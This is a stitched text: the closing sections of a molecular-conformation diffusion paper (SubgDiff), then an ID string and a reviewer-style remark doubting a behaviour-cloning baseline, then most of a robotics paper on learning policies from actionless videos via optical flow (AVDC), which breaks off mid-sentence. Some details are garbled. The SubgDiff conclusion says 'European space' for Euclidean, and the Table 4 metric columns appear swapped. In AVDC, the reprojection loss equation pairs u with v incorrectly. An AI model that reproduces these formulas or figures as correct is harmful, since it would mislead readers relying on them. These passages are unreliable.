64.8±0.25 | 60.6±0.78 | 79.9±3.49 | 74.4±2.45 | 75.9±0.59 | 79.7±1.54 | 72.47 | | GraphMVP | 69.4±0.21 | 76.2±0.38 | 64.5±0.20 | 60.5±0.25 | 86.5±1.70 | 76.2±2.28 | 76.2±0.81 | 79.8±0.74 | 73.66 | | MoleculeSDE(VE) | 68.3±0.25 | 76.9±0.23 | 64.7±0.06 | 60.2±0.29 | 80.8±2.53 | 76.8±1.71 | 77.0±1.68 | 79.9±1.76 | 73.15 | | MoleculeSDE(VP) | 70.1±1.35 | 77.0±0.12 | 64.0±0.07 | 60.8±1.04 | 82.6±3.64 | 76.6±3.25 | 77.3±1.31 | 81.4±0.66 | 73.73 | | Ours | **70.2±2.23** | **77.2±0.39** | **65.0±0.48** | **62.2±0.974** | **88.2±1.57** | **77.3±1.17** | **77.6±0.51** | **82.1±0.96** | **74.85** | Dataset and Settings. For pretraining, we follow Liu et al. (2023a) and use PCQM4Mv2 (Hu et al., 2020b). It’s a sub-dataset of PubChemQC (Nakata & Shimazaki, 2017) with 3.4 million molecules with both the geometric conformations and topological graph. The downstream tasks are various molecular property predictions. Regarding 3D fine-tuning, we take the QM9 dataset and follow the literature (Schutt et al., 2017; 2021; Liu et al., 2023a), using 110K for training, 10K for validation and 11k for testing. For 2D fine-tuning, we use eight 2D molecular property prediction tasks from MoleculeNet (Wu et al., 2017). Pretraining framework. To explore the potential of the proposed method in self-supervised learning tasks, we consider MoleculeSDE (Liu et al., 2023a), a SOTA pretraining framework, to be the training backbone for pertaining 3D molecules, where the $2D \rightarrow 3D$ model we use \textsc{SubgDiff} and $3D \rightarrow 2D$ we simply extend the \textsc{SubgDiff} to process the node feature and graph adjacency. The details can be found in the Appendix. Baselines. For 3D tasks, we incorporate the three coordinate-MI-unaware SSL methods: (1) Type Prediction; (2) Angle Prediction; (3) 3D InfoGraph (Stärk et al., 2022), and two contrastive baselines: (4) GeoSSL-InfoNCE (Oord et al., 2018) and (5) GeoSSL-EBM-NCE (Liu et al., 2021). Additionally, we include two generative SSL baseline: (6) GeoSSL-RR (RR for Representation Reconstruction) and (7) MoleculeSDE(Liu et al., 2023a) For 2D tasks, we consider AttrMask (Hu et al., 2020a; Liu et al., 2019), ContexPred (Hu et al., 2020a), InfoGraph (Sun et al., 2020), MolCLR (Wang et al., 2022b), 3D InfoMax, vanilla GraphMVP (Liu et al., 2021), and MoleculeSDE. More details see Appendix F.1. Results. The results shown in Table 1 and Table 2 suggest that \textsc{SubgDiff} outperforms MoleculeSDE in most downstream tasks, demonstrating the introduced mask vector boosts the perception of molecular substructure in the denoising network during pretraining. Further, \textsc{SubgDiff} achieves SOTA performance compared to the baselines. This also reveals that the proposed masked-based denoising objective is promising for molecular representation learning due to the involvement of the prior knowledge concerning substructure during training. Table 4: Results on GEOM-QM9 dataset under different diffusion timesteps. DDPM (Ho et al., 2020) is the sampling method used in GeoDiff. Our proposed sampling method (Algorithm 2) can be viewed as a DDPM variant. ▲/▼ denotes SUBGDIFF outperforms/underperforms GEODIFF. The threshold δ = 0.5Å. | Models | Timesteps | Sampling method | COV-R (%) ↑ | MAT-R (Å) ↓ | COV-P (%) ↑ | MAT-P (Å) ↓ | |------------|-----------|-----------------|-------------|-------------|-------------|-------------| | GEODIFF | 5000 | DDPM | 80.36 | 83.82 | 0.2820 | 0.2799 | | SUBGDIFF | 5000 | DDPM (ours) | 90.91▲ | 95.39▲ | 0.2460▲ | 0.2351▲ | | GEODIFF | 500 | DDPM | 80.20 | 83.59 | 0.3617 | 0.3412 | | SUBGDIFF | 500 | DDPM (ours) | 89.78▲ | 94.17▲ | 0.2417▲ | 0.2449▲ | | GEODIFF | 200 | DDPM | 69.90 | 72.04 | 0.4222 | 0.4272 | | SUBGDIFF | 200 | DDPM (ours) | 85.53▲ | 88.99▲ | 0.2994▲ | 0.3033▲ | 5.2 Conformation Generation To evaluate the generation efficiency and generation performance, we conduct the experiments with various time steps, including 5000, 500 and 200, to compare SUBGDIFF with GeoDiff. Dataset. Following prior works (Xu et al., 2022; 2021a), we utilize the GEOM-QM9 (Ramakrishnan et al., 2014) and GEOM-Drugs (Axelrod & Gomez-Bombarelli, 2022) datasets. The former dataset comprises small molecules of up to 9 heavy atoms, while the larger drug-like compounds. We reuse the data split provided by Xu et al. (2022). For both datasets, the training dataset comprises 40,000 molecules, each with 5 conformations, resulting in 200,000 conformations in total. The test split includes 200 distinctive molecules, with 14,324 conformations for Drugs and 22,408 conformations for QM9. Denoising networks. Following Xu et al. (2022), we use an equivariant convolutional network GFN as the denoising network for conformation generation and self-supervised learning tasks. The description of evaluation metrics and model architecture are deferred to the Appendix F. Results. The results on the GEOM-QM9 dataset are reported in Table 4. From the results, we get the following observations: (1): SUBGDIFF significantly outperforms the baselines on COV-R and MAT-R, indicating the SUBGDIFF tends to explore more possible conformations. (2): SUBGDIFF consistently outperforms GEODIFF when adopting 200 and 500 sampling steps, demonstrating the competitive sampling efficiency of our method. Surprisingly, SUBGDIFF with 500 steps achieves much better performance than GEODIFF with 5000 steps on 5 out of 8 metrics, which implies our method can accelerate the sampling efficiency (10x). Domain generalization. We design two cross-domain tasks: (1) Training on QM9 (small molecular with up to 9 heavy atoms) and testing on Drugs (medium-sized organic compounds); (2) Training on Drugs and testing on QM9. The results are depicted in Table 3 and Table 10 (refer to Appendix), respectively. The results suggest that SUBGDIFF consistently outperforms GEODIFF by a large margin, demonstrating the introduced mask effectively enhances the robustness and generalization of the denoising network. 6 Conclusion We first present a masked diffusion framework, which involves the subset constraint in the diffusion model by introducing the mask vector to the forward process. The framework is a model-agnostic approach that can be used for any diffusion model built on European space. Further, a novel diffusion model SUBGDIFF is developed for molecular conformation generation and self-supervised representation learning. SUBGDIFF is the first diffusion method that fuses the substructure into training and sampling. Benefiting from the substructure, SUBGDIFF effectively boosts the perception of molecular substructure in the denoising network, thereby achieving state-of-the-art performance at conformation generation and 3D property prediction tasks. There are several exciting avenues for future work. The mask distribution is so flexible that we can incorporate chemical prior knowledge into efficient subgraph sampling. Besides, the proposed SUBGDIFF can be generalized to proteins such that the denoising network can learn meaningful secondary structures. ETHICS STATEMENT In this work, we propose a novel diffusion model for molecular conformation and representation learning, where no human subject is related. REPRODUCIBILITY STATEMENT We summarize the efforts made to ensure reproducibility in this work. (1) Datasets: we use the public datasets QM9 where the processing details are included in sec 5 and Appendix F. (2) Model Training: We provide the training details (including hyper-parameters settings) in Appendix F.1 and the procedure of training in Algorithms 1 and the procedure of sampling in Algorithms 2.
Mhb5fpA1T0
I am concerned by the reported results for the BC baseline. Due to action data being available, as well as the robot data being in-domain for the task a simple BC or kNN baseline should work very well. There are many cases where the results are < 5% success. This should be addressed.
Learning to Act from Actionless Videos through Dense Correspondences Po-Chen Ko† National Taiwan University Jiayuan Mao MIT CSAIL Yilun Du MIT CSAIL Shao-Hua Sun National Taiwan University Joshua B. Tenenbaum MIT BCS, CBMM, CSAIL Abstract In this work, we present an approach to construct a video-based robot policy capable of reliably executing diverse tasks across different robots and environments from few video demonstrations without using any action annotations. Our method leverages images as a task-agnostic representation, encoding both the state and action information, and text as a general representation for specifying robot goals. By synthesizing videos that “hallucinate” robot executing actions and in combination with dense correspondences between frames, our approach can infer the closed-formed action to execute to an environment without the need of any explicit action labels. This unique capability allows us to train the policy solely based on RGB videos and deploy learned policies to various robotic tasks. We demonstrate the efficacy of our approach in learning policies on table-top manipulation and navigation tasks. Additionally, we contribute an open-source framework for efficient video modeling, enabling the training of high-fidelity policy models with four GPUs within a single day. 1 Introduction A goal of robot learning is to construct a policy that can successfully and robustly execute diverse tasks across various robots and environments. A major obstacle is the diversity present in different robotic tasks. The state representation necessary to fold a cloth differs substantially from the one needed for pouring water, picking and placing objects, or navigating, requiring a policy that can process each state representation that arises. Furthermore, the action representation to execute each task varies significantly subject to differences in motor actuation, gripper shape, and task goals, requiring a policy that can correctly deduce an action to execute across different robots and tasks. One approach to solve this issue is to use images as a task-agnostic method for encoding both the states and the actions to execute. In this setting, policy prediction involves synthesizing a video that depicts the actions a robot should execute (Finn & Levine, 2017; Kurutach et al., 2018; Du et al., 2023), enabling different states and actions to be encoded in a modality-agnostic manner. However, directly predicting an image representation a robot should execute does not explicitly encode the required robot actions to execute. To address this, past works either learn an action-specific video prediction model (Finn & Levine, 2017) or a task-specific inverse-dynamics model to predict actions from videos (Du et al., 2023). Both approaches rely on task-specific action labels which can be expensive to collect in practice, preventing general policy prediction across different robot tasks. This work presents a method that first synthesizes a video rendering the desired task execution; then, it directly regresses actions from the synthesized video without requiring any action labels or task-specific inverse-dynamics model, enabling us to directly formulate policy learning as a video generation problem. Our key insight is that action inference from video in many robotics tasks can be formulated as solving for a rigid 3D transform of objects or points in the generated video. Such a transform can be robustly inferred using off-the-shelf optical flow and segmentation networks, and actions can then be executed from these transforms using off-the-shelf inverse kinematics and motion planners. We illustrate the efficacy of our method across various robotics tasks ranging from table-top assembly, ego-centric object navigation, and real-world robot manipulation in Figure 1. † Work done while Po-Chen Ko is a visiting student at MIT. Project page: https://flow-diffusion.github.io/ Another limitation of existing approaches that formulate policy prediction as a video prediction problem is that they suffer from high computational costs during training, requiring the use of over 256 TPU pods (Du et al., 2023), with limited availability of the underlying source code. As a contribution, we provide an open-source codebase for training video policy models. Through a series of architectural optimizations, our framework enables the generation of high-fidelity videos for policy execution, with training accomplished on just 4 GPUs in a single day. Concretely, this work contributes the following: (1) We propose a method to infer actions from video prediction without the need of any action labels by leveraging dense correspondences in a video. (2) We illustrate how this approach enables us to learn policies that can solve diverse tasks across both table-top manipulation and navigation. (3) We present an open-source framework which enables efficient video modeling that enables us to learn policies efficiently on 4 GPUs in a single day. 2 RELATED WORK Robot Learning from Videos. A large body of work has explored how to leverage videos for robot learning (Sun et al., 2018; Pari et al., 2022; Nair et al., 2022; Shao et al., 2021; Chen et al., 2021; Bahl et al., 2022; Sharma et al., 2019; Lee & Ryoo, 2017; Du et al., 2023; Chethan et al., 2023; Karamcheti et al., 2023). One approach relies upon using existing video datasets to construct effective visual representations (Pari et al., 2022; Nair et al., 2022; Karamcheti et al., 2023). Alternatively, goal or subtask information for robotic execution may be extracted for videos (Shao et al., 2021; Chen et al., 2021; Chethan et al., 2023; Bahl et al., 2022; Sharma et al., 2019; Lee & Ryoo, 2017; Sivakumar et al., 2022) or used as a dynamics model for planning (Finn & Levine, 2017; Kurutach et al., 2018). The absence of rewards and action labels distinguishes our work from offline RL (Levine et al., 2020). Most similar to our work, in UniPi (Du et al., 2023), policy prediction may directly be formulated as a text-conditioned video generation problem. Our approach extends UniPi and illustrates how dense correspondences enable action inference without any explicit action labels. Another work with a similar high-level idea to ours (Bharadhwaj et al., 2023) predicts hand poses from videos and uses them directly for control, while we infer actions from object-centric trajectories. While hand poses contain more details of manipulator-object interactions, object-centric actions may help cross-embodiment transfer. Leveraging Dense Correspondences. Dense correspondences have emerged as an effective implicit parameterization of actions and poses (Florence et al., 2018; Manuelli et al., 2022; Yen-Chen et al., 2022; Simeonov et al., 2022; 2023; Chun et al., 2023; Sundaresan et al., 2020; Ryu et al., 2023). Given dense correspondences in 2D (Florence et al., 2018; Manuelli et al., 2022; Sundaresan et al., 2020; Yen-Chen et al., 2022) of 3D (Simeonov et al., 2022; 2023; Chun et al., 2023; Ryu et al., 2023) both object and manipulator poses may be inferred by solving for rigid transforms given correspondences. Our approach uses dense correspondences between adjacent frames of synthesized videos to calculate object of scene transformations and then infer robot actions. Learning from Observation. In contrast to imitation learning (learning from demonstration: Osa et al., 2018; Kipf et al., 2019; Ding et al., 2019; Fang et al., 2019; Mao et al., 2022; Wang et al., 2023), which assumes access to expert actions, learning from observation methods (Torabi et al., 2019b; 2018; 2019a; Lee et al., 2021; Karnan et al., 2022) learn from expert state sequences (e.g., video frames). Action-free pre-training methods (Baker et al., 2022; Escontrela et al., 2023) extract knowledge from unlabeled videos and learn target tasks through RL. For example, a recent approach involves learning value functions by pre-training on existing video datasets (Chethan et al., 2023). Despite encouraging results, these methods require interacting with environments, which may be expensive or even impossible. In contrast, our proposed method does not require environmental interactions and therefore is more applicable. 3 ACTIONS FROM VIDEO DENSE CORRESPONDENCES The architecture of our proposed framework, Actions from Video Dense Correspondences (AVDC), is depicted in Figure 2. AVDC consists of three modules. Given the initial observation (i.e., an RGBD image of the scene and a textual task description), we first employ a video synthesis model to generate a video that implicitly captures the sequence of required actions (Section 3.1). Then, we use a flow prediction model to estimate the optical flow of the scene and objects from the synthesized video (Section 3.2). Finally, leveraging the initial depth map and predicted optical flows, we reconstruct the movements of objects for manipulation or robots for navigation, described in Section 3.3. 3.1 TEXT-CONDITIONED VIDEO GENERATION Our text-conditioned video generation model is a conditional diffusion model. The diffusion model takes the initial frame and a text description as its condition and learns to model the distribution of possible future frames. Throughout this paper, our video generation model predicts a fixed number of future frames ($T = 8$ in our experiments). The diffusion model aims to approximate the distribution $p(img_{1:T} | img_0, txt)$, where $img_{1:T}$ represents the video frames from time step 1 to $T$, $img_0$ denotes the initial frame, and $txt$ represents the task description. We train a denoising function $\epsilon_\theta$ that predicts the noise applied to $img_{1:T}$ given the perturbed frames. Given the Gaussian noise scheduling $\beta_t$, our overall objective is, $$L_{MSE} = \left\| \epsilon - \epsilon_\theta \left( \sqrt{1 - \beta_t} img_{1:T} + \sqrt{\beta_t} \epsilon, t | txt \right) \right\|^2,$$ where $\epsilon$ is sampled from a multivariate standard Gaussian distribution, and $t$ is a randomly sampled diffusion step $t$. A main practical challenge with training such video diffusion models is that they are usually computationally expensive. For example, the closest work to us, UniPi (Du et al. (2023)), requires over 256 TPU pods to train. In this paper, we build a high-fidelity video generation model that can be trained on 4 GPUs in a single day through a series of architectural optimizations. Section G presents complexity analyses and how the process can be significantly accelerated. Our model is a modified version of the image diffusion model proposed by Dhariwal & Nichol (2021), built upon U-Net (Ronneberger et al., 2015), as illustrated in Figure 3a. The U-Net consists of the same number of downsample blocks and upsample blocks. To enhance consistency with the initial frame, we concatenate the input condition frame $img_0$ to all future frames $img_{1:T}$. To encode the text, we use a CLIP-Text (Radford et al., 2021) encoder to obtain a vector embedding and combine it into the video generative model as additional inputs to individual downsampling and upsampling blocks. Importantly, we use a factorized spatial-temporal convolution similar to the model from Ho et al. (2022), within each ResNet block (He et al., 2016). As shown in Figure 3b, in our approach, the 5D input feature map with shape $(B, H, W, T, C)$, where $B$ is the batch size, $H$ and $W$ represent the spatial dimensions, $T$ is the number of time frames, and $C$ denotes the number of channels, undergoes two consecutive convolution operations. First, we apply a spatial convolution identically and independently to each time step \( t = 1, 2, \ldots, T \). Then, we employ a temporal convolution layer identically and independently at each spatial location. This factorized spatial-temporal convolution replaces conventional 3D convolution methods, leading to significant improvements in training and inference efficiency without sacrificing generation quality. More details on the model architecture and training can be found in Section F. ### 3.2 Flow Prediction To regress actions from predicted videos, we leverage flow prediction as an intermediate representation. We employ off-the-shelf GMFlow, a transformer architecture specifically designed for optical flow prediction (Xu et al., 2022). Given two consecutive frames \( img_t \) and \( img_{t+1} \) predicted by the video diffusion model, GMFlow predicts the optical flow between two images as a vector field on the image, which is essentially a pixel-level dense correspondence map between two frames. This allows us to track the movement of each input pixel with a simple integration of this vector field over time. Alternatively, one could train diffusion models to directly predict the flow by first preprocessing training videos with the flow prediction model. However, in our experiments, we encountered challenges in optimizing such models and observed that they failed to match the performance achieved by the two-stage inference pipeline. We conjecture that this difficulty arises from the lack of spatial and temporal smoothness in flow fields. For instance, the flow field is sparse when only a single object moves. Consequently, the Gaussian diffusion model may not be the optimal model for flow distributions. We empirically compare two alternatives in subsequent experiments. ### 3.3 Action Regression from Flows and Depths Based on the predicted flow, which essentially gives us a dense prediction of pixel movements, we can reconstruct object movements and robot movements in the video. Our key insight is to, given the 3D information (depth) of the input frame and dense pixel tracking, reconstruct a sequence of 3D rigid transformations for each object. In this work, we explore two different settings: predicting object transformations assuming a fixed camera (fixed-camera object manipulation) and predicting camera (robot) movement assuming a static scene (visual navigation). **Predict object-centric motion.** We first consider predicting 3D object motions in videos assuming a fixed camera. We represent each object as a set of 3D points \( \{x_i\} \). The points corresponding to the object of interest will be extracted by external segmentation methods, such as a pretrained image segmentation model, or simply specified by the human. Given the camera intrinsic matrix and the input RGBD image, we can compute the initial 3D positions of these points. Let \( T_t \) denote the rigid body transformation of the object at time step \( t \) relative to the initial frame. We can express the projection of a 3D point onto the image plane at time step \( t \) as \( KT_ix = (u_t, v_t, d_t) \), where \( K \) is the camera intrinsic matrix. Furthermore, the projected 2D point on frame \( t \) is thus \( (u_t/d_t, v_t/d_t) \). The optical flow tracking provides us with the projection of the same point in frame \( t \), specifically \( u_t/d_t \) and \( v_t/d_t \). By tracking all points in \( \{x_i\} \), we can find the optimal transformation \( T_t \) that minimizes the following L2 loss: \[ L_{Trans} = \sum_i \left\| \frac{(KT_ix_i)_1}{(KT_ix_i)_3} - \frac{u_t^i}{v_t^i} \right\|^2_2 + \left\| \frac{(KT_ix_i)_2}{(KT_ix_i)_3} - \frac{v_t^i}{u_t^i} \right\|^2_2, \] where \((u^i_t, v^i_t)\) is the corresponding pixel of point \(x_i\) in frame \(t\), and \((KT_t x_i)_i\) denotes the \(i\)-th entry of the vector. It’s worth noting that even if we do not directly observe \(d_t\), this loss function remains well-formed based on the assumption that \(T_t\) represents a rigid body transformation. During execution, we first extract the mask of the object to manipulate and use the dense correspondences in predicted videos to compute the sequence of rigid body transformations for the object. Next, given inferred object transformations, we can use existing off-the-shelf robotics primitives to generalizably infer actions in the environment. In particular, if the object is graspable, we randomly sample a grasp on the object and then compute the target robot end-effector pose based on the target object pose and the grasping pose. When the object is not directly graspable (e.g., a door), we similarly sample a contact point and use a push action to achieve the target object transformation. We treat the grasp/contact point as the first subgoal. Then, we iteratively apply the computed transformation on the current subgoal to compute the next subgoal until all subgoals are computed. Next, we use a position controller to control the robot to reach the subgoals one by one. More details on inferring robot manipulation actions can be found in Section H.1. In contrast to our approach, directly learning explicitly regress actions using a learned inverse dynamics requires a substantial number of action labels so that a neural network can learn existing knowledge such as inverse dynamics, grasping and motion-planning. **Inferring Robot Motion.** The similar algorithm can also be applied to predict robot (i.e., the camera) motion assuming all objects are static. Due to the duality of camera motion and object motion, we can use exactly the same optimization algorithm to find \(T_t\) (object-centric motion), and the camera motion \(C_t = (T_t)^{-1}\). Concretely, we make the following modifications to adapt AVDC to navigation tasks. (1) The video diffusion model is trained to duplicate the last frame once the object is found. (2) Instead of tracking objects, we utilize the optical flow of the whole frame to estimate the rigid transformations between frames. (3) Based on the calculated rigid transformations, we simply map the transformations to the closest actions, detailed in Section H.2. **Depth Estimation.** We can reconstruct 3D object or robot trajectories solely from the depth map of the initial frame (i.e., the subsequent depth maps is not required). By leveraging dense correspondences between frames and assuming rigid object motion, we can reconstruct accurate 3D trajectories. This holds significant advantages as it enables us to train video prediction models exclusively using RGB videos, allowing for learning from online sources like YouTube, and only requires an RGB-D camera (or monocular depth estimator) at execution time. By eliminating the dependence on depth maps from subsequent frames, our system is significantly more adaptable to various data sources. **Replanning Strategy.** After inferring the object or robot trajectories, we can execute the trajectory using a position controller in an open-loop manner. Yet, it can suffer from accumulated errors. As the planning horizon increases, the accuracy of predicted object locations diminishes due to combined errors in video synthesis and flow prediction. To mitigate this issue, we propose a replanning strategy. If the robot movement is smaller than 1mm over 15 consecutive time steps while the task has not been fulfilled, we re-run our video generation and action prediction pipeline from the current observation. ### 4 EXPERIMENTS We describe the baselines and the variants of our proposed method AVDC in Section 4.1. Then, we compare AVDC to its variants and the baselines on simulated robot arm manipulation tasks in Meta-World (Figure 4a) in Section 4.2 and simulated navigation tasks in iTHOR (Figure 4b) in Section 4.3. Note that although it is possible to obtain ground-truth actions from demonstrations in these two domains, our method does not use these actions; instead, these actions are only used by the baselines to provide an understanding of the task difficulty. Then, Section 4.4 evaluate the ability of AVDC to control robots by learning from out-of-domain human videos without actions, as illustrated in Figure 4c. In Section 4.5, we leverage the Bridge dataset (Figure 4d) and evaluate AVDC on real-world manipulation tasks with a Franka Emika Panda robot arm (Figure 4e). Extended qualitative results can be found in Section B and additional experimental details can be found in Section H. #### 4.1 BASELINES AND VARIANTS OF AVDC **Baselines.** We compare AVDC to a multi-task behavioral cloning (BC) baseline given access to a set of expert actions from all videos (15,216 labeled frame-action pairs in Meta-World and 5,757 in iTHOR), which are unavailable to our method. This baseline encodes the RGB observation to a Figure 4: **Environments & Tasks.** (a) **Meta-World** is a simulated benchmark featuring various tasks with a Sawyer robot arm. (b) **iTHOR** is a simulated benchmark for embodied common sense reasoning. We adopt its object navigation task, requiring navigating to target objects located in different rooms. (c) **Visual Pusher** is a real-world video dataset with 195 human pushing videos. (d) **Bridge** is a real-world video dataset comprised of 33,078 robot demonstrations conducting various kitchen tasks. (e) **Panda Arm** is a real-world pick-and-place tabletop environment with a Franka Emika Panda robot arm. feature vector with a ResNet-18 (He et al., 2016). Then, the feature vector is concatenated with a one-hot encoded camera ID and a task representation encoded by the CLIP-Text model (Radford et al., 2021). The concatenated representation is then fed to a 3-layer MLP, which produces an action. We explore initializing the weights of ResNet-18 from scratch (BC-Scratch) or from the pre-trained parameters of R3M (Nair et al., 2022) (BC-R3M). Additionally, we experimented with Diffusion Policy (Chi et al., 2023), which also leverages denoising diffusion, but directly predicts actions instead of video frames like we did. We followed the setting used by most of the experiments in the original paper. More details are described in Section H.1.4. We also implement UniPi (Du et al., 2023), a learning-from-video method that learns an inverse dynamics model to generate actions from videos, as a baseline. Specifically, UniPi infers actions from the videos synthesized by AVDC. Since the exact number of steps between two generated frames in our model may vary across different episodes, we modify the inverse dynamics model to output an additional binary label indicating whether to switch to the next frame of synthesized video plans. This predictor can be trained with the demonstrations (with actions) used to train the BC baselines. **AVDC and its Variants.** We compare AVDC to its variants that also predict dense correspondence. - **AVDC (Flow)** learns to directly predict the optical flow between frames as described in Section 3.2. We include this variant to justify our 2-stage design, which synthesizes a video and then infers optical flows between each pair of frames. - **AVDC (No Replan)** is the opened-loop variant of our proposed method, which synthesizes a video, infers flows, produces a plan, executes it, and finishes, regardless of if it fails or succeeds. We include this variant to investigate whether our replanning strategy is effective. - **AVDC (Full)** is our proposed method in full, employing the 2-stage design and can replan. **Additional Ablation Studies and Experiments.** We also include additional ablation studies on the effect of first-frame conditioning in video generation and different text encoders (e.g., CLIP and T5) in Section E, a study of extracting object mask with existing segmentation model in Section D.1, an experiment training BC with more data in Section D.2, using object masks extensively as proxy for actions in Section D.3, and a quantitative quality analysis on the synthesized videos in Section D.4. ### 4.2 Meta-World **Setup.** Meta-World (Yu et al., 2019) is a simulated benchmark featuring various manipulation tasks with a Sawyer robot arm. We include 11 tasks, and for each task, we render videos from 3 different camera poses. The same set of camera poses is used for training and testing. We collect 5 demonstrations per task per camera position, resulting in total 165 videos. To isolate the problem of learning object manipulation skills, for our methods and all its variants, we provide the ground-truth segmentation mask for the target object. We include an additional study on using external segmentation models in Appendix D.1. Each policy is evaluated on each task with 3 camera poses, each with 25 trials. A policy succeeds if it reaches the goal state within the maximum environment step and fails otherwise. The positions of the robot arm and objects are randomized when each episode begins. The result is reported in Table 1. **Comparison to Baselines.** Our method AVDC (Full) consistently outperforms the two BC baselines (BC-Scratch and BC-R3M) and UniPi on all the tasks by a large margin. Furthermore, AVDC | | door-open | door-close | basketball | shelf-place | btn-press | btn-press-top | |------------------|-----------|------------|------------|-------------|-----------|---------------| | BC-Scratch | 21.3% | 36.0% | 0.0% | 0.0% | 34.7% | 12.0% | | BC-R3M | 1.3% | 58.7% | 0.0% | 0.0% | 36.0% | 4.0% | | UniPi (With Replan) | 0.0% | 36.0% | 0.0% | 0.0% | 6.7% | 0.0% | | Diffusion Policy | 45.3% | 45.3% | 8.0% | 0.0% | 40.0% | 18.7% | | AVDC (ID) | 0.0% | 36.0% | 0.0% | 0.0% | 0.0% | 0.0% | | AVDC (Flow) | 0.0% | 0.0% | 0.0% | 0.0% | 1.3% | 40.0% | | AVDC (No Replan) | 30.7% | 28.0% | 21.3% | 8.0% | 34.7% | 17.3% | | AVDC (Full) | 72.0% | 89.3% | 37.3% | 18.7% | 60.0% | 24.0% | | | faucet-close | faucet-open | handle-press | hammer | assembly | Overall | |------------------|--------------|-------------|--------------|--------|----------|---------| | BC-Scratch | 18.7% | 17.3% | 37.3% | 0.0% | 1.3% | 16.2% | | BC-R3M | 18.7% | 22.7% | 28.0% | 0.0% | 0.0% | 15.4% | | UniPi (With Replan) | 4.0% | 9.3% | 13.3% | 4.0% | 0.0% | 6.1% | | Diffusion Policy | 22.7% | 58.7% | 21.3% | 4.0% | 1.3% | 24.1% | | AVDC (ID) | 4.0% | 9.3% | 13.3% | 4.0% | 0.0% | 6.1% | | AVDC (Flow) | 42.7% | 0.0% | 66.7% | 0.0% | 0.0% | 13.7% | | AVDC (No Replan) | 12.0% | 17.3% | 41.3% | 0.0% | 5.3% | 19.6% | | AVDC (Full) | 53.3% | 24.0% | 81.3% | 8.0% | 6.7% | 43.1% | Table 1: Meta-World Result. We report the mean success rate across tasks. Each entry of the table shows the average success rate aggregated from 3 camera poses with 25 seeds for each camera pose. (Full) also outperforms the Diffusion Policy in 10 out of 11 tasks and in overall performance by a significant margin. This indicates that the tasks are still very challenging, even with access to expert actions. Note that AVDC (Full) is able to solve the task “hammer,” which involves using tools, with performance surpassing all baselines. This is done by predicting actions based on tool motions. Comparing AVDC Variants. AVDC (Flow) performs the best on button-press-topdown and achieves reasonable performance on faucet-close and handle-press, while performing very poorly on the rest of the tasks. As described in Section 3.2, the diffusion model employed in this work may not be optimal for flow prediction. Also, AVDC (Full) consistently outperforms AVDC (No Replan), justifying the effectiveness of our closed-loop design, enabling replanning when the policy fails. Intermediate Outputs. To provide insights into the pipeline of AVDC, we visualized the synthesized video, predicted optical flow, and inferred actions (i.e., motion planning) in Figure 5. Our diffusion model synthesizes a reasonable video showing the robot arm picking up the nut and placing it onto the peg. The optical flow predicted from video frames accurately captures the robot arm’s motions. Then, based on the predicted flow, the inferred actions can reliably guide the arm to fulfill the task. Effect of Replanning Trials. We investigate how varying the maximum number of replanning step affects the performance of AVDC. As presented in Figure 6, the success rate consistently increases with more replanning trials, demonstrating the effectiveness of our proposed replanning strategy. Failure Modes. The primary failure mode we observed is the errors made by the optical flow tracking model, partially because these models are not trained on any in-domain data. Since the prediction resolution is not very high in our experiments, small pixel-level errors in tracking small objects would... result in large errors in the 3D space. We believe that by directly increasing the resolution of video synthesis or by training an in-domain optical flow model, we can improve the performance. 4.3 iTHOR Setup. iTHOR (Kolve et al., 2017) is a simulated benchmark for embodied common sense reasoning. We consider the object navigation tasks for evaluation, where an agent randomly initialized into a scene learns to navigate to an object of a given type (e.g., toaster, television). At each time step, the agent observes a 2D scene and takes one of the four actions: MoveForward, RotateLeft, RotateRight, and Done. We chose 12 different objects to be placed at 4 type of rooms (e.g., kitchen, living room). No object segmentation is required in this navigation task. Each policy is evaluated on 12 object navigation tasks distributed in 4 different types of rooms (3 tasks for each room). A policy succeeds if the target object is in the agent’s sight and within a 1.5m distance within the maximum environment step or when Done is predicted and fails otherwise. The position of the agent is randomized at the beginning of each episode. The result is reported in Table 2. Comparison to Baselines. Our proposed method AVDC can find target objects in different types of rooms fairly often (31.3%), while the two BC baselines fail entirely. BC-R3M with a pre-trained ResNet-18 performs worse than BC-Scratch, which can be attributed to the fact that R3M is pre-trained on robot manipulation tasks and might not be suitable for visual navigation tasks. Intermediate Outputs. The intermediate outputs produced by AVDC are presented in Figure 7. The diffusion model can synthesize video showing an agent navigating to the target object. Then, desired agent movements can be easily inferred from the predicted optical flow, resulting in the ease of mapping the flow to MoveForward, RotateLeft, or RotateRight. When no flow is predicted, it indicates the agent has found the object and selects Done as the predicted action. 4.4 CROSS-EMBODIMENT LEARNING: FROM HUMAN VIDEOS TO ROBOT EXECUTION We aim to examine if AVDC can achieve cross-embodiment learning, e.g., leverage human demonstration videos to control robots to solve tasks. Setup. We evaluate our method with Visual Pusher tasks (Schmeckpeper et al., 2021; Zakka et al., 2022). Specifically, we learn a video diffusion model from only actionless human pushing data (198 videos), with the same U-net architecture used in Meta-World experiments and trained the model for 10k steps. Then, we evaluate AVDC on simulated robot pushing tasks without any fine-tuning. Results. AVDC exhibits strong zero-shot transfer capability, achieving a 90% zero-shot success rate out of 40 runs. This indicates that AVDC can perform cross-embodiment learning — utilizing out-of-domain human videos to achieve reliable robot execution. A synthesized video and the corresponding robot execution are illustrated in Figure 8. | Room | BC-Scratch | BC-R3M | AVDC | |------------|------------|--------|------| | Kitchen | 1.7% | 0.0% | 26.7%| | Living Room| 3.3% | 0.0% | 23.3%| | Bedroom | 1.7% | 1.7% | 38.3%| | Bathroom | 1.7% | 0.0% | 36.7%| | Overall | 2.1% | 0.4% | 31.3%| Table 2: iTHOR Result. We report the mean success rate, aggregated from 3 types of objects per room with 20 episodes per object. Both the two BC baselines fail to achieve meaningful performance on the iTHOR object navigation tasks. On the other hand, AVDC performs reasonably with a 31.3% average success rate. 4.5 Real-World Franka Emika Panda Arm with Bridge Dataset We aim to investigate if our proposed framework AVDC can tackle real-world robotics tasks. To this end, we train our video generation model on the Bridge dataset (Ebert et al., 2022), and perform evaluation on a real-world Franka Emika Panda tabletop manipulation environment. Setup. The Bridge dataset (Ebert et al., 2022) provides 33,078 teleoperated WidowX 250 robot demonstrations of various kitchen tasks captured by a web camera without depth information. Our real-world setup comprises a Franka Emika Panda robot arm and an Intel Realsense D435 RGBD camera mounted at a fixed frame relative to the table. Due to the differences in camera FOVs and the environmental setup, directly applying the video generative model trained on Bridge to our setup does not generalize well. We thus fine-tuned the diffusion model with 20 human demonstrations collected with our setup. In our real-world evaluation, we assume that the target object can be grasped using a top-grasp so that no reorientation of the target object is needed. Note that both the Bridge dataset and our 